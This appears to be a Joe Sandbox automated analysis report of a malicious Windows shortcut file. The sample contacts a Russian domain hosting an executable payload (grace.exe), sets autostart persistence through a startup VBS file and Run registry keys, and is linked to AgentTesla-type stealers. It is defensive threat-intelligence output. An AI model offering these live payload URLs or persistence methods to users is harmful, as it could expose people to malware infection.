                    https://contoso.com/License0%URL Reputationsafe
                    https://contoso.com/Icon0%URL Reputationsafe
                    https://aka.ms/pscore680%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                    http://ip-api.com/line/?fields=hosting0%URL Reputationsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    techniqueqatar.com
                    		208.91.198.176
                    		truetrue
                      		unknown
                      oootorgline.ru
                      		176.99.3.36
                      		truetrue
                        		unknown
                        api.ipify.org
                        		172.67.74.152
                        		truefalse
                          		unknown
                          ip-api.com
                          		208.95.112.1
                          		truetrue
                            		unknown
                            171.39.242.20.in-addr.arpa
                            		unknown
                            		unknowntrue
                              		unknown

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              https://api.ipify.org/false
                              • URL Reputation: safe
                              		unknown
                              https://oootorgline.ru/components/grace.exetrue
                                		unknown
                                http://ip-api.com/line/?fields=hostingfalse
                                • URL Reputation: safe
                                		unknown

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.2287618621.00000221376BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2287618621.0000022137800000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://api.ipify.orgRegSvcs.exe, 00000008.00000002.2567429663.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2557012499.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.3370850966.00000000028EC000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://oootorgline.rupowershell.exe, 00000000.00000002.2262113733.0000022128282000.00000004.00000800.00020000.00000000.sdmptrue
                                  		unknown
                                  http://crl.mRegSvcs.exe, 0000000C.00000002.3381286822.0000000005C16000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		unknown
                                    https://account.dyn.com/RegSvcs.exe, 00000008.00000002.2557012499.0000000000402000.00000040.80000000.00040000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000000.00000002.2262113733.0000022127882000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000000.00000002.2262113733.0000022127882000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://go.micropowershell.exe, 00000000.00000002.2262113733.0000022128282000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://contoso.com/powershell.exe, 00000000.00000002.2287618621.0000022137800000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.2287618621.00000221376BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2287618621.0000022137800000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.microsoft.copowershell.exe, 00000000.00000002.2296430995.000002213F920000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		unknown
                                        https://contoso.com/Licensepowershell.exe, 00000000.00000002.2287618621.0000022137800000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://ip-api.comRegSvcs.exe, 00000008.00000002.2567429663.0000000003401000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.3370850966.0000000002931000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		unknown
                                          https://contoso.com/Iconpowershell.exe, 00000000.00000002.2287618621.0000022137800000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://oootorgline.rupowershell.exe, 00000000.00000002.2262113733.0000022128C30000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://aka.ms/pscore68powershell.exe, 00000000.00000002.2262113733.0000022127651000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://api.ipify.org/tRegSvcs.exe, 00000008.00000002.2567429663.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.3370850966.00000000028EC000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		unknown
                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.2262113733.0000022127651000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2567429663.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.3370850966.00000000028EC000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://techniqueqatar.comRegSvcs.exe, 00000008.00000002.2567429663.00000000034CB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2567429663.000000000343E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.3370850966.0000000002989000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.3370850966.0000000002A17000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		unknown
                                                https://github.com/Pester/Pesterpowershell.exe, 00000000.00000002.2262113733.0000022127882000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		unknown

                                                  World Map of Contacted IPs

                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs

                                                  Public IPs

                                                  IPDomainCountryFlagASNASN NameMalicious
                                                  208.91.198.176
                                                  		techniqueqatar.comUnited States
                                                  		394695PUBLIC-DOMAIN-REGISTRYUStrue
                                                  208.95.112.1
                                                  		ip-api.comUnited States
                                                  		53334TUT-ASUStrue
                                                  176.99.3.36
                                                  		oootorgline.ruRussian Federation
                                                  		197695AS-REGRUtrue
                                                  104.26.13.205
                                                  		unknownUnited States
                                                  		13335CLOUDFLARENETUSfalse
                                                  172.67.74.152
                                                  		api.ipify.orgUnited States
                                                  		13335CLOUDFLARENETUSfalse

                                                  General Information

                                                  Joe Sandbox version:41.0.0 Charoite
                                                  Analysis ID:1520403
                                                  Start date and time:2024-09-27 10:38:10 +02:00
                                                  Joe Sandbox product:CloudBasic
                                                  Overall analysis duration:0h 7m 2s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Cookbook file name:default.jbs
                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                  Number of analysed new started processes analysed:17
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:0
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Sample name:RTGS-WB-ABS-240730-NEW.lnk
                                                  Detection:MAL
                                                  Classification:mal100.troj.spyw.expl.evad.winLNK@17/13@8/5
                                                  EGA Information:
                                                  • Successful, ratio: 40%
                                                  HCA Information:
                                                  • Successful, ratio: 100%
                                                  • Number of executed functions: 151
                                                  • Number of non-executed functions: 4
                                                  Cookbook Comments:
                                                  • Found application associated with file extension: .lnk

                                                  Warnings

                                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                  • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                  • Execution Graph export aborted for target aWUFv.exe, PID 2120 because it is empty
                                                  • Execution Graph export aborted for target aWUFv.exe, PID 3884 because it is empty
                                                  • Execution Graph export aborted for target powershell.exe, PID 1824 because it is empty
                                                  • Not all processes where analyzed, report is missing behavior information
                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                  • VT rate limit hit for: RTGS-WB-ABS-240730-NEW.lnk

                                                  Simulations

                                                  Behavior and APIs

                                                  TimeTypeDescription
                                                  04:39:07API Interceptor43x Sleep call for process: powershell.exe modified
                                                  04:39:28API Interceptor88671x Sleep call for process: RegSvcs.exe modified
                                                  10:39:29AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\recomplaint.vbs
                                                  10:39:42AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run aWUFv C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exe
                                                  10:39:50AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run aWUFv C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exe

                                                  Joe Sandbox View / Context

                                                  IPs

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  208.95.112.1Payment.jsGet hashmaliciousWSHRATBrowse
                                                  • ip-api.com/json/
                                                  17273903480db0ad761710af8e624417944f4f8d39d0a8e65a343113de75e06efab5a25c3f534.dat-decoded.exeGet hashmaliciousClipboard Hijacker, QuasarBrowse
                                                  • ip-api.com/json/
                                                  file.exeGet hashmaliciousQuasar, WhiteSnake StealerBrowse
                                                  • ip-api.com/line?fields=query,country
                                                  REQUEST FOR QUOTATION.jsGet hashmaliciousPXRECVOWEIWOEI Stealer, PureLog StealerBrowse
                                                  • ip-api.com/line/?fields=hosting
                                                  DSR0987678900000.exeGet hashmaliciousAgentTeslaBrowse
                                                  • ip-api.com/line/?fields=hosting
                                                  Proof Of Payment.jsGet hashmaliciousWSHRATBrowse
                                                  • ip-api.com/json/
                                                  450230549.exeGet hashmaliciousAgentTeslaBrowse
                                                  • ip-api.com/line/?fields=hosting
                                                  SecuriteInfo.com.Win32.Malware-gen.27656.20815.exeGet hashmaliciousBlackshades, QuasarBrowse
                                                  • ip-api.com/json/
                                                  nDHL_AWB_6078538091_scr.exeGet hashmaliciousAgentTeslaBrowse
                                                  • ip-api.com/line/?fields=hosting
                                                  CCE_000110.exeGet hashmaliciousAgentTeslaBrowse
                                                  • ip-api.com/line/?fields=hosting
                                                  104.26.13.205file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, Stealc, VidarBrowse
                                                  • api.ipify.org/
                                                  file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                  • api.ipify.org/
                                                  SecuriteInfo.com.Win64.Evo-gen.13899.14592.exeGet hashmaliciousUnknownBrowse
                                                  • api.ipify.org/
                                                  file.exeGet hashmaliciousLummaC, VidarBrowse
                                                  • api.ipify.org/
                                                  file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                  • api.ipify.org/
                                                  file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                  • api.ipify.org/
                                                  file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                  • api.ipify.org/
                                                  file.exeGet hashmaliciousUnknownBrowse
                                                  • api.ipify.org/
                                                  file.exeGet hashmaliciousUnknownBrowse
                                                  • api.ipify.org/
                                                  file.exeGet hashmaliciousLummaC, VidarBrowse
                                                  • api.ipify.org/

                                                  Domains

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  ip-api.comPayment.jsGet hashmaliciousWSHRATBrowse
                                                  • 208.95.112.1
                                                  17273903480db0ad761710af8e624417944f4f8d39d0a8e65a343113de75e06efab5a25c3f534.dat-decoded.exeGet hashmaliciousClipboard Hijacker, QuasarBrowse
                                                  • 208.95.112.1
                                                  file.exeGet hashmaliciousQuasar, WhiteSnake StealerBrowse
                                                  • 208.95.112.1
                                                  REQUEST FOR QUOTATION.jsGet hashmaliciousPXRECVOWEIWOEI Stealer, PureLog StealerBrowse
                                                  • 208.95.112.1
                                                  DSR0987678900000.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 208.95.112.1
                                                  Proof Of Payment.jsGet hashmaliciousWSHRATBrowse
                                                  • 208.95.112.1
                                                  450230549.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 208.95.112.1
                                                  SecuriteInfo.com.Win32.Malware-gen.27656.20815.exeGet hashmaliciousBlackshades, QuasarBrowse
                                                  • 208.95.112.1
                                                  nDHL_AWB_6078538091_scr.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 208.95.112.1
                                                  CCE_000110.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 208.95.112.1
                                                  api.ipify.orgPurchase order.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 172.67.74.152
                                                  https://mzansibonds.com/dshk/tmpasdfghjklkjhgfdewertyuioiuytresdxcvbnmnbvfcdsew345678987654rewsdfvgbhnjhbgvfdesw23e45678uijdhgfcsvzbdncqasdcxw.phpGet hashmaliciousHTMLPhisherBrowse
                                                  • 104.26.13.205
                                                  http://correctingservicesalakks.pages.dev/Get hashmaliciousUnknownBrowse
                                                  • 104.26.12.205
                                                  file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                  • 104.26.12.205
                                                  file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                  • 104.26.12.205
                                                  https://lothanse-heracklarne.pages.dev/help/contact/547074160798771Get hashmaliciousHTMLPhisherBrowse
                                                  • 104.26.13.205
                                                  file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                  • 172.67.74.152
                                                  file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, Stealc, VidarBrowse
                                                  • 104.26.13.205
                                                  file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                  • 104.26.13.205
                                                  https://docs.zoom.us/doc/c63Sae4RQ6OyTcxmh_zLzw?from=email&data=05%7C02%7CRyan.Deiter@americansignature.com%7Ce3b8b957491b4e36dfd108dcde65b619%7C5c02e89ab9684d4e960de62c7cd02766%7C0%7C0%7C638629775655136517%7CUnknown%7CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0=%7C0%7C%7C%7C&sdata=RMvLQDF1y92hR5HKChbiO0e0aKONAOKzPjDkQ4i5MTY=&reserved=0Get hashmaliciousUnknownBrowse
                                                  • 172.67.74.152

                                                  ASNs

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  PUBLIC-DOMAIN-REGISTRYUSDekont.rar.xlxs.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                  • 119.18.54.39
                                                  http://labanquepostale.jupiter-analytics.com/thierry--_--.barbier/brigitte.--_--boissel@/francoise--_--.mariani@/salvatore--_--.fazzalariGet hashmaliciousUnknownBrowse
                                                  • 162.222.225.80
                                                  https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp/p%C2%ADep%C2%ADe%C2%ADm%C2%ADu%C2%ADj%C2%ADi%C2%ADc%C2%ADa%C2%AD.%C2%ADc%C2%ADom/hjGet hashmaliciousUnknownBrowse
                                                  • 162.215.254.118
                                                  http://labanquepostale.jupiter-analytics.com/thierry--_--.barbier/brigitte.--_--boissel@/francoise--_--.mariani@/salvatore--_--.fazzalari/Get hashmaliciousUnknownBrowse
                                                  • 162.222.225.80
                                                  SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                  • 208.91.199.225
                                                  Halkbank_Ekstre_22#U202693.25.09.24.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                  • 119.18.54.39
                                                  z84TTREMITTANCEUSD347_432_63.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                  • 208.91.198.143
                                                  z9OutstandingPayment.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                  • 208.91.199.223
                                                  http://www.tri-star.in/mn/onedrive.htmlGet hashmaliciousUnknownBrowse
                                                  • 208.91.198.225
                                                  PAYSLIP.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                  • 208.91.199.224
                                                  AS-REGRUPO For Bulk Order.exeGet hashmaliciousFormBookBrowse
                                                  • 31.31.196.17
                                                  UMOWA_PD.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                  • 194.58.112.174
                                                  CSBls4grBI.exeGet hashmaliciousLummaC, Socks5SystemzBrowse
                                                  • 194.58.114.223
                                                  0435.pdf.exeGet hashmaliciousSmokeLoaderBrowse
                                                  • 194.58.112.174
                                                  AWB_5771388044 Documenti di spedizione.exeGet hashmaliciousFormBookBrowse
                                                  • 194.58.112.174
                                                  PO2024033194.exeGet hashmaliciousFormBookBrowse
                                                  • 194.58.112.174
                                                  RECIEPT.PDF.exeGet hashmaliciousFormBookBrowse
                                                  • 194.58.112.174
                                                  SecuriteInfo.com.Win32.TrojanX-gen.1325.25139.exeGet hashmaliciousAmadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, Stealc, VidarBrowse
                                                  • 194.58.114.223
                                                  http://xn--r1a.website/s/ogorodruGet hashmaliciousUnknownBrowse
                                                  • 194.67.71.75
                                                  ncOLm62YLB.exeGet hashmaliciousFormBookBrowse
                                                  • 194.58.112.174
                                                  CLOUDFLARENETUS#docs_8299010377388200191-pdf.jsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                  • 162.159.129.233
                                                  AGMETIGA zapytanie ofertowe.xlsGet hashmaliciousPureLog StealerBrowse
                                                  • 172.67.179.215
                                                  175-33-26-24.HTA.htaGet hashmaliciousUnknownBrowse
                                                  • 104.16.231.132
                                                  Dekont.rar.xlxs.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                  • 188.114.97.3
                                                  dekont.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                  • 188.114.97.3
                                                  Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousSnake KeyloggerBrowse
                                                  • 188.114.97.3
                                                  Purchase Inquiry-0012.xlsGet hashmaliciousUnknownBrowse
                                                  • 104.21.64.88
                                                  QT2Q1292.xla.xlsxGet hashmaliciousFormBookBrowse
                                                  • 104.21.64.88
                                                  https://bgbonline.cecchinatoonline.top/Get hashmaliciousHtmlDropperBrowse
                                                  • 188.114.96.3
                                                  QUOTATION_SEPQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                  • 188.114.96.3
                                                  TUT-ASUSPayment.jsGet hashmaliciousWSHRATBrowse
                                                  • 208.95.112.1
                                                  17273903480db0ad761710af8e624417944f4f8d39d0a8e65a343113de75e06efab5a25c3f534.dat-decoded.exeGet hashmaliciousClipboard Hijacker, QuasarBrowse
                                                  • 208.95.112.1
                                                  file.exeGet hashmaliciousQuasar, WhiteSnake StealerBrowse
                                                  • 208.95.112.1
                                                  REQUEST FOR QUOTATION.jsGet hashmaliciousPXRECVOWEIWOEI Stealer, PureLog StealerBrowse
                                                  • 208.95.112.1
                                                  DSR0987678900000.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 208.95.112.1
                                                  Proof Of Payment.jsGet hashmaliciousWSHRATBrowse
                                                  • 208.95.112.1
                                                  450230549.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 208.95.112.1
                                                  SecuriteInfo.com.Win32.Malware-gen.27656.20815.exeGet hashmaliciousBlackshades, QuasarBrowse
                                                  • 208.95.112.1
                                                  nDHL_AWB_6078538091_scr.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 208.95.112.1
                                                  0umBa15TaN.exeGet hashmaliciousUnknownBrowse
                                                  • 208.95.112.1
                                                  CLOUDFLARENETUS#docs_8299010377388200191-pdf.jsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                  • 162.159.129.233
                                                  AGMETIGA zapytanie ofertowe.xlsGet hashmaliciousPureLog StealerBrowse
                                                  • 172.67.179.215
                                                  175-33-26-24.HTA.htaGet hashmaliciousUnknownBrowse
                                                  • 104.16.231.132
                                                  Dekont.rar.xlxs.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                  • 188.114.97.3
                                                  dekont.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                  • 188.114.97.3
                                                  Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousSnake KeyloggerBrowse
                                                  • 188.114.97.3
                                                  Purchase Inquiry-0012.xlsGet hashmaliciousUnknownBrowse
                                                  • 104.21.64.88
                                                  QT2Q1292.xla.xlsxGet hashmaliciousFormBookBrowse
                                                  • 104.21.64.88
                                                  https://bgbonline.cecchinatoonline.top/Get hashmaliciousHtmlDropperBrowse
                                                  • 188.114.96.3
                                                  QUOTATION_SEPQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                  • 188.114.96.3

                                                  JA3 Fingerprints

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  3b5074b1b5d032e5620f69f9f700ff0e#docs_8299010377388200191-pdf.jsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                  • 104.26.13.205
                                                  • 176.99.3.36
                                                  • 172.67.74.152
                                                  Dekont.rar.xlxs.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                  • 104.26.13.205
                                                  • 176.99.3.36
                                                  • 172.67.74.152
                                                  https://ojbkjs.vip/yb.jsGet hashmaliciousUnknownBrowse
                                                  • 104.26.13.205
                                                  • 176.99.3.36
                                                  • 172.67.74.152
                                                  QUOTATION_SEPQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                  • 104.26.13.205
                                                  • 176.99.3.36
                                                  • 172.67.74.152
                                                  file.exeGet hashmaliciousUnknownBrowse
                                                  • 104.26.13.205
                                                  • 176.99.3.36
                                                  • 172.67.74.152
                                                  Purchase order.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 104.26.13.205
                                                  • 176.99.3.36
                                                  • 172.67.74.152
                                                  https://jbrizuelablplegal.taplink.ws/Get hashmaliciousHTMLPhisherBrowse
                                                  • 104.26.13.205
                                                  • 176.99.3.36
                                                  • 172.67.74.152
                                                  http://home-103607.weeblysite.com/Get hashmaliciousHTMLPhisherBrowse
                                                  • 104.26.13.205
                                                  • 176.99.3.36
                                                  • 172.67.74.152
                                                  http://brawllstars.ru/Get hashmaliciousHTMLPhisherBrowse
                                                  • 104.26.13.205
                                                  • 176.99.3.36
                                                  • 172.67.74.152
                                                  https://tiktomallapp.top/Get hashmaliciousUnknownBrowse
                                                  • 104.26.13.205
                                                  • 176.99.3.36
                                                  • 172.67.74.152

                                                  Dropped Files

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exeshipping documents.exeGet hashmaliciousAgentTeslaBrowse
                                                    shipping documents.exeGet hashmaliciousAgentTeslaBrowse
                                                      autorization Letter.exeGet hashmaliciousAgentTeslaBrowse
                                                        rMT103SwiftCopyoFPayment.exeGet hashmaliciousAgentTeslaBrowse
                                                          Shipping Document.exeGet hashmaliciousAgentTeslaBrowse
                                                            COMMERCAIL INVOICE AND TNT AWB TRACKING INVOICE.exeGet hashmaliciousAgentTeslaBrowse
                                                              DHL- CBJ520818836689.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                DHL- CBJ520818836689.exeGet hashmaliciousAgentTeslaBrowse
                                                                  Shipping documents.exeGet hashmaliciousAgentTeslaBrowse
                                                                    Shipping doc.exeGet hashmaliciousAgentTeslaBrowse

                                                                      Created / dropped Files

                                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\aWUFv.exe.log

                                                                      Download File
                                                                      Process:C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exe
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:modified
                                                                      Size (bytes):142
                                                                      Entropy (8bit):5.090621108356562
                                                                      Encrypted:false
                                                                      SSDEEP:3:QHXMKa/xwwUC7WglAFXMWA2yTMGfsbNRLFS9Am12MFuAvOAsDeieVyn:Q3La/xwczlAFXMWTyAGCDLIP12MUAvvw
                                                                      MD5:8C0458BB9EA02D50565175E38D577E35
                                                                      SHA1:F0B50702CD6470F3C17D637908F83212FDBDB2F2
                                                                      SHA-256:C578E86DB701B9AFA3626E804CF434F9D32272FF59FB32FA9A51835E5A148B53
                                                                      SHA-512:804A47494D9A462FFA6F39759480700ECBE5A7F3A15EC3A6330176ED9C04695D2684BF6BF85AB86286D52E7B727436D0BB2E8DA96E20D47740B5CE3F856B5D0F
                                                                      Malicious:false
                                                                      Reputation:high, very likely benign file
                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.EnterpriseServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):64
                                                                      Entropy (8bit):1.1940658735648508
                                                                      Encrypted:false
                                                                      SSDEEP:3:Nlllul51Tz:NllU
                                                                      MD5:63C202BE9DBE08688DBCF921992E089A
                                                                      SHA1:AA18D35F50D15566FA375F9FDB030CDBEE26F777
                                                                      SHA-256:4CB3BC30A57F1DEFAE2677102DA2CC3FAAF8D402CF25D247EFC4A5242C2C986B
                                                                      SHA-512:C43049499F7E07BE8DFE945AB801FB2E39AB0BA55F2E8A884FFDAC7A56C0E80BF188033218FE9B28A8374EB5843B462A8BF7F15E1D74162A641F470AD989B392
                                                                      Malicious:false
                                                                      Preview:@...e.................................h.T............@..........

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_03z3klie.fhq.psm1

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_duy0shnp.1z5.ps1

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\file.exe

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):1305263
                                                                      Entropy (8bit):7.126088648073379
                                                                      Encrypted:false
                                                                      SSDEEP:24576:SRmJkcoQricOIQxiZY1iabicPx38FUk+0:HJZoQrbTFZY1iabXMakz
                                                                      MD5:AA6F514A7AFA81E26BCF612923EA483C
                                                                      SHA1:2033A141125D0A0989EF3C0002833BACF0A390C7
                                                                      SHA-256:997C285947AE58D2ACFB5C0B32ADFA7288168FAA5AA691D094F5FFD9A9728A3A
                                                                      SHA-512:F8D0475754589E9D57462AC8A13820132714FF682A8655E1CA95D037FB2E65F62815A79AF855B4E2707CF9CB5A9EE35E262CBA4D277B90AD823BCFE4D1D5D335
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
